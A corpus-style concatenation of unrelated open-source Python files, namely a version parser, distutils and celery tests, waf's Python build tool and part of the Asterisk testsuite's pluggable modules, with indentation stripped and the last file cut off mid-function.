# | | |'- a=alpha, b=beta, c=release candidate or none
# | | '- micro version number
# | '- minor version number
# '- major version number
# The presence of the nano version number means that this is a development
# version. There are no guarantees about compatibility, etc. This version is
# considered to be more recent than the version without this field
# (e.g. "1.0.0a1").
# The nano version number or revision number is meaningful only to developers.
# It gets generated automatically from darcs revision control history by
# "darcsver.py". The nano version number is the count of patches that have been
# applied since the last version number tag was applied. The revision number is
# the count of all patches that have been applied in the history.
VERSION_BASE_RE_STR="(\d+)(\.(\d+)(\.(\d+))?)?((a|b|c)(\d+))?(\.dev(\d+))?"
VERSION_SUFFIX_RE_STR="(-(\d+|r\d+)|.post\d+)?"
VERSION_RE_STR=VERSION_BASE_RE_STR + VERSION_SUFFIX_RE_STR
VERSION_RE=re.compile("^" + VERSION_RE_STR + "$")
class Version(object):
def __init__(self, vstring=None):
self.major = None
self.minor = None
self.micro = None
self.prereleasetag = None
self.prerelease = None
self.nano = None
self.revision = None
if vstring:
try:
self.parse(vstring)
except ValueError, le:
le.args = tuple(le.args + ('vstring:', vstring,))
raise
def parse(self, vstring):
mo = VERSION_RE.search(vstring)
if not mo:
raise ValueError, "Not a valid version string for pyutil.version_class.Version(): %r" % (vstring,)
self.major = int(mo.group(1))
self.minor = mo.group(3) and int(mo.group(3)) or 0
self.micro = mo.group(5) and int(mo.group(5)) or 0
reltag = mo.group(6)
if reltag:
reltagnum = int(mo.group(8))
self.prereleasetag = mo.group(7)
self.prerelease = reltagnum
if mo.group(11):
if mo.group(11)[0] == '-':
if mo.group(12)[0] == 'r':
self.revision = int(mo.group(12)[1:])
else:
self.nano = int(mo.group(12))
else:
assert mo.group(11).startswith('.post'), mo.group(11)
self.revision = int(mo.group(11)[5:])
# XXX in the future, to be compatible with the Python "rational version numbering" scheme, we should move to using .post$REV instead of -r$REV:
# self.fullstr = "%d.%d.%d%s%s" % (self.major, self.minor, self.micro, self.prereleasetag and "%s%d" % (self.prereleasetag, self.prerelease,) or "", self.nano and "-%d" % (self.nano,) or self.revision and ".post%d" % (self.revision,) or "",)
self.fullstr = "%d.%d.%d%s%s" % (self.major, self.minor, self.micro, self.prereleasetag and "%s%d" % (self.prereleasetag, self.prerelease,) or "", self.nano and "-%d" % (self.nano,) or self.revision and "-r%d" % (self.revision,) or "",)
def user_str(self):
return self.full_str()
def full_str(self):
if hasattr(self, 'fullstr'):
return self.fullstr
else:
return 'None'
def __str__(self):
return self.full_str()
def __repr__(self):
return self.__str__()
def __cmp__ (self, other):
return cmp_version(self, other)
| gpl-3.0 |
bgris/ODL_bgris | lib/python3.5/distutils/tests/test_install_lib.py | 11 | 3934 | """Tests for distutils.command.install_data."""
import sys
import os
import importlib.util
import unittest
from distutils.command.install_lib import install_lib
from distutils.extension import Extension
from distutils.tests import support
from distutils.errors import DistutilsOptionError
from test.support import run_unittest
class InstallLibTestCase(support.TempdirManager,
support.LoggingSilencer,
support.EnvironGuard,
unittest.TestCase):
def test_finalize_options(self):
dist = self.create_dist()[1]
cmd = install_lib(dist)
cmd.finalize_options()
self.assertEqual(cmd.compile, 1)
self.assertEqual(cmd.optimize, 0)
# optimize must be 0, 1, or 2
cmd.optimize = 'foo'
self.assertRaises(DistutilsOptionError, cmd.finalize_options)
cmd.optimize = '4'
self.assertRaises(DistutilsOptionError, cmd.finalize_options)
cmd.optimize = '2'
cmd.finalize_options()
self.assertEqual(cmd.optimize, 2)
@unittest.skipIf(sys.dont_write_bytecode, 'byte-compile disabled')
def test_byte_compile(self):
project_dir, dist = self.create_dist()
os.chdir(project_dir)
cmd = install_lib(dist)
cmd.compile = cmd.optimize = 1
f = os.path.join(project_dir, 'foo.py')
self.write_file(f, '# python file')
cmd.byte_compile([f])
pyc_file = importlib.util.cache_from_source('foo.py', optimization='')
pyc_opt_file = importlib.util.cache_from_source('foo.py',
optimization=cmd.optimize)
self.assertTrue(os.path.exists(pyc_file))
self.assertTrue(os.path.exists(pyc_opt_file))
def test_get_outputs(self):
project_dir, dist = self.create_dist()
os.chdir(project_dir)
os.mkdir('spam')
cmd = install_lib(dist)
# setting up a dist environment
cmd.compile = cmd.optimize = 1
cmd.install_dir = self.mkdtemp()
f = os.path.join(project_dir, 'spam', '__init__.py')
self.write_file(f, '# python package')
cmd.distribution.ext_modules = [Extension('foo', ['xxx'])]
cmd.distribution.packages = ['spam']
cmd.distribution.script_name = 'setup.py'
# get_outputs should return 4 elements: spam/__init__.py and .pyc,
# foo.import-tag-abiflags.so / foo.pyd
outputs = cmd.get_outputs()
self.assertEqual(len(outputs), 4, outputs)
def test_get_inputs(self):
project_dir, dist = self.create_dist()
os.chdir(project_dir)
os.mkdir('spam')
cmd = install_lib(dist)
# setting up a dist environment
cmd.compile = cmd.optimize = 1
cmd.install_dir = self.mkdtemp()
f = os.path.join(project_dir, 'spam', '__init__.py')
self.write_file(f, '# python package')
cmd.distribution.ext_modules = [Extension('foo', ['xxx'])]
cmd.distribution.packages = ['spam']
cmd.distribution.script_name = 'setup.py'
# get_inputs should return 2 elements: spam/__init__.py and
# foo.import-tag-abiflags.so / foo.pyd
inputs = cmd.get_inputs()
self.assertEqual(len(inputs), 2, inputs)
def test_dont_write_bytecode(self):
# makes sure byte_compile is not used
dist = self.create_dist()[1]
cmd = install_lib(dist)
cmd.compile = 1
cmd.optimize = 1
old_dont_write_bytecode = sys.dont_write_bytecode
sys.dont_write_bytecode = True
try:
cmd.byte_compile([])
finally:
sys.dont_write_bytecode = old_dont_write_bytecode
self.assertIn('byte-compiling is disabled', self.logs[0][1])
def test_suite():
return unittest.makeSuite(InstallLibTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
| gpl-3.0 |
GNOME/hamster-applet | wafadmin/Tools/python.py | 7 | 11127 | #! /usr/bin/env python
# encoding: utf-8
import os,sys
import TaskGen,Utils,Utils,Runner,Options,Build
from Logs import debug,warn,info
from TaskGen import extension,taskgen,before,after,feature
from Configure import conf
EXT_PY=['.py']
FRAG_2='''
#include "Python.h"
#ifdef __cplusplus
extern "C" {
#endif
void Py_Initialize(void);
void Py_Finalize(void);
#ifdef __cplusplus
}
#endif
int main()
{
Py_Initialize();
Py_Finalize();
return 0;
}
'''
def init_pyext(self):
self.default_install_path='${PYTHONDIR}'
self.uselib=self.to_list(getattr(self,'uselib',''))
if not'PYEXT'in self.uselib:
self.uselib.append('PYEXT')
self.env['MACBUNDLE']=True
def pyext_shlib_ext(self):
self.env['shlib_PATTERN']=self.env['pyext_PATTERN']
def init_pyembed(self):
self.uselib=self.to_list(getattr(self,'uselib',''))
if not'PYEMBED'in self.uselib:
self.uselib.append('PYEMBED')
def process_py(self,node):
if not(self.bld.is_install and self.install_path):
return
def inst_py(ctx):
install_pyfile(self,node)
self.bld.add_post_fun(inst_py)
def install_pyfile(self,node):
path=self.bld.get_install_path(self.install_path+os.sep+node.name,self.env)
self.bld.install_files(self.install_path,[node],self.env,self.chmod,postpone=False)
if self.bld.is_install<0:
info("* removing byte compiled python files")
for x in'co':
try:
os.remove(path+x)
except OSError:
pass
if self.bld.is_install>0:
if self.env['PYC']or self.env['PYO']:
info("* byte compiling %r"%path)
if self.env['PYC']:
program=("""
import sys, py_compile
for pyfile in sys.argv[1:]:
py_compile.compile(pyfile, pyfile + 'c')
""")
argv=[self.env['PYTHON'],'-c',program,path]
ret=Utils.pproc.Popen(argv).wait()
if ret:
raise Utils.WafError('bytecode compilation failed %r'%path)
if self.env['PYO']:
program=("""
import sys, py_compile
for pyfile in sys.argv[1:]:
py_compile.compile(pyfile, pyfile + 'o')
""")
argv=[self.env['PYTHON'],self.env['PYFLAGS_OPT'],'-c',program,path]
ret=Utils.pproc.Popen(argv).wait()
if ret:
raise Utils.WafError('bytecode compilation failed %r'%path)
class py_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def init_py(self):
self.default_install_path='${PYTHONDIR}'
def _get_python_variables(python_exe,variables,imports=['import sys']):
program=list(imports)
program.append('')
for v in variables:
program.append("print(repr(%s))"%v)
os_env=dict(os.environ)
try:
del os_env['MACOSX_DEPLOYMENT_TARGET']
except KeyError:
pass
proc=Utils.pproc.Popen([python_exe,"-c",'\n'.join(program)],stdout=Utils.pproc.PIPE,env=os_env)
output=proc.communicate()[0].split("\n")
if proc.returncode:
if Options.options.verbose:
warn("Python program to extract python configuration variables failed:\n%s"%'\n'.join(["line %03i: %s"%(lineno+1,line)for lineno,line in enumerate(program)]))
raise RuntimeError
return_values=[]
for s in output:
s=s.strip()
if not s:
continue
if s=='None':
return_values.append(None)
elif s[0]=="'"and s[-1]=="'":
return_values.append(s[1:-1])
elif s[0].isdigit():
return_values.append(int(s))
else:break
return return_values
def check_python_headers(conf,mandatory=True):
if not conf.env['CC_NAME']and not conf.env['CXX_NAME']:
conf.fatal('load a compiler first (gcc, g++, ..)')
if not conf.env['PYTHON_VERSION']:
conf.check_python_version()
env=conf.env
python=env['PYTHON']
if not python:
conf.fatal('could not find the python executable')
if Options.platform=='darwin':
conf.check_tool('osx')
try:
v='prefix SO SYSLIBS LDFLAGS SHLIBS LIBDIR LIBPL INCLUDEPY Py_ENABLE_SHARED MACOSX_DEPLOYMENT_TARGET'.split()
(python_prefix,python_SO,python_SYSLIBS,python_LDFLAGS,python_SHLIBS,python_LIBDIR,python_LIBPL,INCLUDEPY,Py_ENABLE_SHARED,python_MACOSX_DEPLOYMENT_TARGET)=_get_python_variables(python,["get_config_var('%s')"%x for x in v],['from distutils.sysconfig import get_config_var'])
except RuntimeError:
conf.fatal("Python development headers not found (-v for details).")
conf.log.write("""Configuration returned from %r:
python_prefix = %r
python_SO = %r
python_SYSLIBS = %r
python_LDFLAGS = %r
python_SHLIBS = %r
python_LIBDIR = %r
python_LIBPL = %r
INCLUDEPY = %r
Py_ENABLE_SHARED = %r
MACOSX_DEPLOYMENT_TARGET = %r
"""%(python,python_prefix,python_SO,python_SYSLIBS,python_LDFLAGS,python_SHLIBS,python_LIBDIR,python_LIBPL,INCLUDEPY,Py_ENABLE_SHARED,python_MACOSX_DEPLOYMENT_TARGET))
if python_MACOSX_DEPLOYMENT_TARGET:
conf.env['MACOSX_DEPLOYMENT_TARGET']=python_MACOSX_DEPLOYMENT_TARGET
conf.environ['MACOSX_DEPLOYMENT_TARGET']=python_MACOSX_DEPLOYMENT_TARGET
env['pyext_PATTERN']='%s'+python_SO
if python_SYSLIBS is not None:
for lib in python_SYSLIBS.split():
if lib.startswith('-l'):
lib=lib[2:]
env.append_value('LIB_PYEMBED',lib)
if python_SHLIBS is not None:
for lib in python_SHLIBS.split():
if lib.startswith('-l'):
env.append_value('LIB_PYEMBED',lib[2:])
else:
env.append_value('LINKFLAGS_PYEMBED',lib)
if Options.platform!='darwin'and python_LDFLAGS:
env.append_value('LINKFLAGS_PYEMBED',python_LDFLAGS.split())
result=False
name='python'+env['PYTHON_VERSION']
if python_LIBDIR is not None:
path=[python_LIBDIR]
conf.log.write("\n\n# Trying LIBDIR: %r\n"%path)
result=conf.check(lib=name,uselib='PYEMBED',libpath=path)
if not result and python_LIBPL is not None:
conf.log.write("\n\n# try again with -L$python_LIBPL (some systems don't install the python library in $prefix/lib)\n")
path=[python_LIBPL]
result=conf.check(lib=name,uselib='PYEMBED',libpath=path)
if not result:
conf.log.write("\n\n# try again with -L$prefix/libs, and pythonXY name rather than pythonX.Y (win32)\n")
path=[os.path.join(python_prefix,"libs")]
name='python'+env['PYTHON_VERSION'].replace('.','')
result=conf.check(lib=name,uselib='PYEMBED',libpath=path)
if result:
env['LIBPATH_PYEMBED']=path
env.append_value('LIB_PYEMBED',name)
else:
conf.log.write("\n\n### LIB NOT FOUND\n")
if(sys.platform=='win32'or sys.platform.startswith('os2')or sys.platform=='darwin'or Py_ENABLE_SHARED):
env['LIBPATH_PYEXT']=env['LIBPATH_PYEMBED']
env['LIB_PYEXT']=env['LIB_PYEMBED']
python_config=conf.find_program('python%s-config'%('.'.join(env['PYTHON_VERSION'].split('.')[:2])),var='PYTHON_CONFIG')
if not python_config:
python_config=conf.find_program('python-config-%s'%('.'.join(env['PYTHON_VERSION'].split('.')[:2])),var='PYTHON_CONFIG')
includes=[]
if python_config:
for incstr in Utils.cmd_output("%s %s --includes"%(python,python_config)).strip().split():
if(incstr.startswith('-I')or incstr.startswith('/I')):
incstr=incstr[2:]
if incstr not in includes:
includes.append(incstr)
conf.log.write("Include path for Python extensions ""(found via python-config --includes): %r\n"%(includes,))
env['CPPPATH_PYEXT']=includes
env['CPPPATH_PYEMBED']=includes
else:
conf.log.write("Include path for Python extensions ""(found via distutils module): %r\n"%(INCLUDEPY,))
env['CPPPATH_PYEXT']=[INCLUDEPY]
env['CPPPATH_PYEMBED']=[INCLUDEPY]
if env['CC_NAME']=='gcc':
env.append_value('CCFLAGS_PYEMBED','-fno-strict-aliasing')
env.append_value('CCFLAGS_PYEXT','-fno-strict-aliasing')
if env['CXX_NAME']=='gcc':
env.append_value('CXXFLAGS_PYEMBED','-fno-strict-aliasing')
env.append_value('CXXFLAGS_PYEXT','-fno-strict-aliasing')
conf.check(define_name='HAVE_PYTHON_H',uselib='PYEMBED',fragment=FRAG_2,errmsg='Could not find the python development headers',mandatory=mandatory)
def check_python_version(conf,minver=None):
assert minver is None or isinstance(minver,tuple)
python=conf.env['PYTHON']
if not python:
conf.fatal('could not find the python executable')
cmd=[python,"-c","import sys\nfor x in sys.version_info: print(str(x))"]
debug('python: Running python command %r'%cmd)
proc=Utils.pproc.Popen(cmd,stdout=Utils.pproc.PIPE)
lines=proc.communicate()[0].split()
assert len(lines)==5,"found %i lines, expected 5: %r"%(len(lines),lines)
pyver_tuple=(int(lines[0]),int(lines[1]),int(lines[2]),lines[3],int(lines[4]))
result=(minver is None)or(pyver_tuple>=minver)
if result:
pyver='.'.join([str(x)for x in pyver_tuple[:2]])
conf.env['PYTHON_VERSION']=pyver
if'PYTHONDIR'in conf.environ:
pydir=conf.environ['PYTHONDIR']
else:
if sys.platform=='win32':
(python_LIBDEST,pydir)=_get_python_variables(python,["get_config_var('LIBDEST')","get_python_lib(standard_lib=0, prefix=%r)"%conf.env['PREFIX']],['from distutils.sysconfig import get_config_var, get_python_lib'])
else:
python_LIBDEST=None
(pydir,)=_get_python_variables(python,["get_python_lib(standard_lib=0, prefix=%r)"%conf.env['PREFIX']],['from distutils.sysconfig import get_config_var, get_python_lib'])
if python_LIBDEST is None:
if conf.env['LIBDIR']:
python_LIBDEST=os.path.join(conf.env['LIBDIR'],"python"+pyver)
else:
python_LIBDEST=os.path.join(conf.env['PREFIX'],"lib","python"+pyver)
if hasattr(conf,'define'):
conf.define('PYTHONDIR',pydir)
conf.env['PYTHONDIR']=pydir
pyver_full='.'.join(map(str,pyver_tuple[:3]))
if minver is None:
conf.check_message_custom('Python version','',pyver_full)
else:
minver_str='.'.join(map(str,minver))
conf.check_message('Python version',">= %s"%minver_str,result,option=pyver_full)
if not result:
conf.fatal('The python version is too old (%r)'%pyver_full)
def check_python_module(conf,module_name):
result=not Utils.pproc.Popen([conf.env['PYTHON'],"-c","import %s"%module_name],stderr=Utils.pproc.PIPE,stdout=Utils.pproc.PIPE).wait()
conf.check_message('Python module',module_name,result)
if not result:
conf.fatal('Could not find the python module %r'%module_name)
def detect(conf):
if not conf.env.PYTHON:
conf.env.PYTHON=sys.executable
python=conf.find_program('python',var='PYTHON')
if not python:
conf.fatal('Could not find the path of the python executable')
v=conf.env
v['PYCMD']='"import sys, py_compile;py_compile.compile(sys.argv[1], sys.argv[2])"'
v['PYFLAGS']=''
v['PYFLAGS_OPT']='-O'
v['PYC']=getattr(Options.options,'pyc',1)
v['PYO']=getattr(Options.options,'pyo',1)
def set_options(opt):
opt.add_option('--nopyc',action='store_false',default=1,help='Do not install bytecode compiled .pyc files (configuration) [Default:install]',dest='pyc')
opt.add_option('--nopyo',action='store_false',default=1,help='Do not install optimised compiled .pyo files (configuration) [Default:install]',dest='pyo')
before('apply_incpaths','apply_lib_vars','apply_type_vars')(init_pyext)
feature('pyext')(init_pyext)
before('apply_bundle')(init_pyext)
before('apply_link','apply_lib_vars','apply_type_vars')(pyext_shlib_ext)
after('apply_bundle')(pyext_shlib_ext)
feature('pyext')(pyext_shlib_ext)
before('apply_incpaths','apply_lib_vars','apply_type_vars')(init_pyembed)
feature('pyembed')(init_pyembed)
extension(EXT_PY)(process_py)
before('apply_core')(init_py)
after('vars_target_cprogram','vars_target_cshlib')(init_py)
feature('py')(init_py)
conf(check_python_headers)
conf(check_python_version)
conf(check_python_module)
| gpl-3.0 |
cbrepo/celery | celery/tests/test_utils/test_utils_info.py | 14 | 1112 | from __future__ import absolute_import
from celery import Celery
from celery.utils import textindent
from celery.tests.utils import Case
RANDTEXT = """\
The quick brown
fox jumps
over the
lazy dog\
"""
RANDTEXT_RES = """\
The quick brown
fox jumps
over the
lazy dog\
"""
QUEUES = {"queue1": {
"exchange": "exchange1",
"exchange_type": "type1",
"binding_key": "bind1"},
"queue2": {
"exchange": "exchange2",
"exchange_type": "type2",
"binding_key": "bind2"}}
QUEUE_FORMAT1 = """. queue1: exchange:exchange1 (type1) binding:bind1"""
QUEUE_FORMAT2 = """. queue2: exchange:exchange2 (type2) binding:bind2"""
class TestInfo(Case):
def test_textindent(self):
self.assertEqual(textindent(RANDTEXT, 4), RANDTEXT_RES)
def test_format_queues(self):
celery = Celery(set_as_current=False)
celery.amqp.queues = celery.amqp.Queues(QUEUES)
self.assertEqual(sorted(celery.amqp.queues.format().split("\n")),
sorted([QUEUE_FORMAT1, QUEUE_FORMAT2]))
| bsd-3-clause |
asterisk/testsuite | lib/python/asterisk/pluggable_modules.py | 1 | 38856 | """Generic pluggable modules
Copyright (C) 2012, Digium, Inc.
Kinsey Moore <[email protected]>
This program is free software, distributed under the terms of
the GNU General Public License Version 2.
"""
import os
import sys
import logging
import shutil
import re
sys.path.append("lib/python")
from .ami import AMIEventInstance
from twisted.internet import reactor
from starpy import fastagi
from .test_runner import load_and_parse_module
from .pluggable_registry import PLUGGABLE_ACTION_REGISTRY,\
PLUGGABLE_EVENT_REGISTRY,\
PluggableRegistry
from . import matcher
LOGGER = logging.getLogger(__name__)
class Originator(object):
"""Pluggable module class that originates calls in Asterisk"""
def __init__(self, module_config, test_object):
"""Initialize config and register test_object callbacks."""
self.ami = None
test_object.register_ami_observer(self.ami_connect)
self.test_object = test_object
self.current_destination = 0
self.ami_callback = None
self.scenario_count = 0
self.config = {
'channel': 'Local/s@default',
'application': 'Echo',
'data': '',
'context': '',
'exten': '',
'priority': '',
'ignore-originate-failure': 'no',
'trigger': 'scenario_start',
'scenario-trigger-after': None,
'scenario-name': None,
'id': '0',
'account': None,
'async': 'False',
'event': None,
'timeout': None,
'codecs': None,
}
# process config
if not module_config:
return
for k in module_config.keys():
if k in self.config:
self.config[k] = module_config[k]
if self.config['trigger'] == 'scenario_start':
if (self.config['scenario-trigger-after'] is not None and
self.config['scenario-name'] is not None):
LOGGER.error("Conflict between 'scenario-trigger-after' and "
"'scenario-name'. Only one may be used.")
raise Exception
else:
test_object.register_scenario_started_observer(
self.scenario_started)
elif self.config['trigger'] == 'event':
if not self.config['event']:
LOGGER.error("Event specifier for trigger type 'event' is "
"missing")
raise Exception
# set id to the AMI id for the origination if it is unset
if 'id' not in self.config['event']:
self.config['event']['id'] = self.config['id']
callback = AMIPrivateCallbackInstance(self.config['event'],
test_object,
self.originate_callback)
self.ami_callback = callback
return
def ami_connect(self, ami):
"""Handle new AMI connections."""
LOGGER.info("AMI %s connected", str(ami.id))
if str(ami.id) == self.config['id']:
self.ami = ami
if self.config['trigger'] == 'ami_connect':
self.originate_call()
return
def failure(self, result):
"""Handle origination failure."""
if self.config['ignore-originate-failure'] == 'no':
LOGGER.info("Originate failed: %s", str(result))
self.test_object.set_passed(False)
return None
def originate_callback(self, ami, event):
"""Handle event callbacks."""
LOGGER.info("Got event callback for Origination")
self.originate_call()
return True
def originate_call(self):
"""Originate the call"""
LOGGER.info("Originating call")
defer = None
if len(self.config['context']) > 0:
defer = self.ami.originate(channel=self.config['channel'],
context=self.config['context'],
exten=self.config['exten'],
priority=self.config['priority'],
timeout=self.config['timeout'],
account=self.config['account'],
codecs=self.config['codecs'],
async=self.config['async'])
else:
defer = self.ami.originate(channel=self.config['channel'],
application=self.config['application'],
data=self.config['data'],
timeout=self.config['timeout'],
account=self.config['account'],
codecs=self.config['codecs'],
async=self.config['async'])
defer.addErrback(self.failure)
def scenario_started(self, result):
"""Handle origination on scenario start if configured to do so."""
LOGGER.info("Scenario '%s' started", result.name)
if self.config['scenario-name'] is not None:
if result.name == self.config['scenario-name']:
LOGGER.debug("Scenario name '%s' matched", result.name)
self.originate_call()
elif self.config['scenario-trigger-after'] is not None:
self.scenario_count += 1
trigger_count = int(self.config['scenario-trigger-after'])
if self.scenario_count == trigger_count:
LOGGER.debug("Scenario count has been met")
self.originate_call()
else:
self.originate_call()
return result
class AMIPrivateCallbackInstance(AMIEventInstance):
"""Subclass of AMIEventInstance that operates by calling a user-defined
callback function. The callback function returns the current disposition
of the test (i.e. whether the test is currently passing or failing).
"""
def __init__(self, instance_config, test_object, callback):
"""Constructor"""
super(AMIPrivateCallbackInstance, self).__init__(instance_config,
test_object)
self.callback = callback
if 'start' in instance_config:
self.passed = True if instance_config['start'] == 'pass' else False
def event_callback(self, ami, event):
"""Generic AMI event handler"""
self.passed = self.callback(ami, event)
return (ami, event)
def check_result(self, callback_param):
"""Set the test status based on the result of self.callback"""
self.test_object.set_passed(self.passed)
return callback_param
class AMIChannelHangup(AMIEventInstance):
"""An AMIEventInstance derived class that hangs up a channel when an
event is matched."""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(AMIChannelHangup, self).__init__(instance_config, test_object)
self.hungup_channel = False
self.delay = instance_config.get('delay') or 0
def event_callback(self, ami, event):
"""Override of the event callback"""
if self.hungup_channel:
return
if 'channel' not in event:
return
LOGGER.info("Hanging up channel %s", event['channel'])
self.hungup_channel = True
reactor.callLater(self.delay, ami.hangup, event['channel'])
return (ami, event)
class AMIChannelHangupAll(AMIEventInstance):
"""An AMIEventInstance derived class that hangs up all the channels when
an event is matched."""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(AMIChannelHangupAll, self).__init__(instance_config, test_object)
test_object.register_ami_observer(self.__ami_connect)
self.channels = []
def __ami_connect(self, ami):
"""AMI connect handler"""
if str(ami.id) in self.ids:
ami.registerEvent('Newchannel', self.__new_channel_handler)
ami.registerEvent('Hangup', self.__hangup_handler)
def __new_channel_handler(self, ami, event):
"""New channel event handler"""
self.channels.append({'id': ami.id, 'channel': event['channel']})
def __hangup_handler(self, ami, event):
"""Hangup event handler"""
objects = [x for x in self.channels if
(x['id'] == ami.id and
x['channel'] == event['channel'])]
for obj in objects:
self.channels.remove(obj)
def event_callback(self, ami, event):
"""Override of the event callback"""
def __hangup_ignore(result):
"""Ignore hangup errors"""
# Ignore hangup errors - if the channel is gone, we don't care
return result
objects = [x for x in self.channels if x['id'] == ami.id]
for obj in objects:
LOGGER.info("Hanging up channel %s", obj['channel'])
ami.hangup(obj['channel']).addErrback(__hangup_ignore)
self.channels.remove(obj)
class ARIHangupMonitor(object):
"""A class that monitors for new channels and hungup channels in ARI.
This is the same as HangupMonitor, except that it listens over ARI
to avoid any issue with race conditions. Note that it will implicitly
create a global subscription to channels, which may conflict with
tests that don't expect to get all those events.
"""
def __init__(self, instance_config, test_object):
"""Constructor"""
super(ARIHangupMonitor, self).__init__()
self.delay = 0
if 'delay-stop' in instance_config:
self.delay = instance_config['delay-stop']
self.test_object = test_object
self.test_object.register_ari_observer(self._handle_ws_open)
self.test_object.register_ws_event_handler(self._handle_ws_event)
self.channels = 0
def _handle_ws_open(self, ari_receiver):
"""Handle WS connection"""
LOGGER.info(ari_receiver.apps)
for app in ari_receiver.apps.split(','):
self.test_object.ari.post('applications/{0}/subscription?eventSource=channel:'.format(app))
def _handle_ws_event(self, message):
"""Handle a message received over the WS"""
message_type = message.get('type')
if (message_type == 'ChannelCreated'):
LOGGER.info('Tracking channel %s', message.get('channel'))
self.channels += 1
elif (message_type == 'ChannelDestroyed'):
LOGGER.info('Destroyed channel %s', message.get('channel'))
self.channels -= 1
if (self.channels == 0):
LOGGER.info("All channels have hungup; stopping test after %d seconds",
self.delay)
reactor.callLater(self.delay, self.test_object.stop_reactor)
class HangupMonitor(object):
"""A class that monitors for new channels and hungup channels. When all
channels it has monitored for have hung up, it ends the test.
Essentially, as long as there are new channels it will keep the test
going; however, once channels start hanging up it will kill the test
on the last hung up channel.
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(HangupMonitor, self).__init__()
self.config = instance_config
self.test_object = test_object
self.test_object.register_ami_observer(self.__ami_connect)
self.channels = []
self.num_calls = 0
def __ami_connect(self, ami):
"""AMI connect handler"""
if str(ami.id) in self.config["ids"]:
ami.registerEvent('Newchannel', self.__new_channel_handler)
ami.registerEvent('Rename', self.__rename_handler)
ami.registerEvent('Hangup', self.__hangup_handler)
def __new_channel_handler(self, ami, event):
"""Handler for the Newchannel event"""
LOGGER.debug("Tracking channel %s", event['channel'])
self.channels.append(event['channel'])
return (ami, event)
def __hangup_handler(self, ami, event):
"""Handler for the Hangup event"""
LOGGER.debug("Channel %s hungup", event['channel'])
self.channels.remove(event['channel'])
self.num_calls += 1
if 'min_calls' in self.config \
and self.num_calls < self.config["min_calls"]:
return (ami, event)
if len(self.channels) == 0:
LOGGER.info("All channels have hungup; stopping test")
self.stop_test()
return (ami, event)
def __rename_handler(self, ami, event):
LOGGER.debug("Channel {0} renamed to {1}".format(event['channel'],
event['newname']))
self.channels.append(event['newname'])
self.channels.remove(event['channel'])
def stop_test(self):
"""Allow subclasses to take different actions to stop the test."""
self.test_object.stop_reactor()
class CallFiles(object):
""" This class allows call files to be created from a YAML configuration"""
def __init__(self, instance_config, test_object):
"""Constructor"""
super(CallFiles, self).__init__()
self.test_object = test_object
self.call_file_instances = instance_config
self.locale = ""
if self.call_file_instances:
self.test_object.register_ami_observer(self.ami_connect)
else:
LOGGER.error("No configuration was specified for call files")
self.test_failed()
def test_failed(self):
"""Checks to see whether or not the call files were
correctly specified """
self.test_object.set_passed(False)
self.test_object.stop_reactor()
def write_call_file(self, call_file_num, call_file):
"""Write out the specified call file
Keyword Parameters:
call_file_num Which call file in the test we're writing out
call_file A dictionary containing the call file
information, derived from the YAML
"""
params = call_file.get('call-file-params')
if not params:
LOGGER.error("No call file parameters specified")
self.test_failed()
return
self.locale = ("%s%s/tmp/test%d.call" %
(self.test_object.ast[int(call_file['id'])].base,
self.test_object.ast[int(call_file['id'])].directories
["astspooldir"], call_file_num))
with open(self.locale, 'w') as outfile:
for key, value in params.items():
outfile.write("%s: %s\n" % (key, value))
LOGGER.debug("Wrote call file to %s", self.locale)
self.move_file(call_file_num, call_file)
def ami_connect(self, ami):
"""Handler for AMI connection """
for index, call_file in enumerate(self.call_file_instances):
if ami.id == int(call_file.get('id')):
self.write_call_file(index, call_file)
def move_file(self, call_file_num, call_file):
"""Moves call files to astspooldir directory to be run """
src_file = self.locale
dst_file = ("%s%s/outgoing/test%s.call" %
(self.test_object.ast[int(call_file['id'])].base,
self.test_object.ast[int(call_file['id'])].directories
["astspooldir"], call_file_num))
LOGGER.info("Moving file %s to %s", src_file, dst_file)
shutil.move(src_file, dst_file)
os.utime(dst_file, None)
class SoundChecker(object):
""" This class allows the user to check if a given sound file exists,
whether a sound file fits within a range of file size, and has enough
energy in it to pass a BackgroundDetect threshold of silence"""
def __init__(self, module_config, test_object):
"""Constructor"""
super(SoundChecker, self).__init__()
self.test_object = test_object
self.module_config = module_config['sound-file-config']
self.filepath = ""
self.sound_file = {}
self.actions = []
self.index = 0
self.action_index = 0
self.auto_stop = module_config.get('auto-stop', False)
self.test_object.register_ami_observer(self.ami_connect)
def build_sound_file_location(self, filename, path_type, path_name=""):
"""Creates the filepath for the given sound file.
File_path_types should include relative and absolute, and if absolute,
look for an absolute_path string. Fails if the path type is invalid
or parameters are missing
Keyword Arguments:
filename: The same of the file to be set and used
path-type: The type of path file- either relative or absolute
path_name: Optional parameter that must be included with an
absolute type_path. It stores the actual file path to be
used
returns:
filepath: The filepath that this sound_file test will use.
"""
asterisk_instance = self.module_config[self.index].get('id', 0)
if path_type == 'relative':
ast_instance = self.test_object.ast[asterisk_instance]
base_path = ast_instance.base
spool_dir = ast_instance.directories["astspooldir"]
filepath = ("%s%s/%s" % (base_path, spool_dir, filename))
return filepath
elif path_type == 'absolute':
if path_name:
filepath = "%s/%s" % (path_name, filename)
return filepath
else:
raise Exception("No absolute path specified")
else:
raise Exception("Invalid file path type or undefined path type")
def size_check(self, ami):
"""The size range test.
Checks whether the size of the file meets a certain threshold of
byte size. Fails if it doesn't. Iterates action_index so that the
next action can be done.
Keyword Arguments:
ami- the AMI instance used by this test, not used by this function
but needs to be passed into sound_check_actions to continue
"""
filesize = -1
filesize = os.path.getsize(self.filepath)
size = self.actions[self.action_index].get('size')
tolerance = self.actions[self.action_index].get('tolerance')
if ((filesize - size) > tolerance) or ((size - filesize) > tolerance):
LOGGER.error("""File '%s' failed size check: expected %d, actual %d
(tolerance +/- %d""" % (
self.filepath, size, filesize, tolerance))
self.test_object.set_passed(False)
if self.auto_stop:
self.test_object.stop_reactor()
return
else:
self.action_index += 1
self.sound_check_actions(ami)
def energy_check(self, ami):
"""Checks the energy levels of a given sound file.
This is done by creating a local channel into a dialplan extension
that does a BackgroundDetect on the sound file. The extensions must
be defined by the user.
Keyword Arguments:
ami- the AMI instance used by this test
"""
energyfile = self.filepath[:self.filepath.find('.')]
action = self.actions[self.action_index]
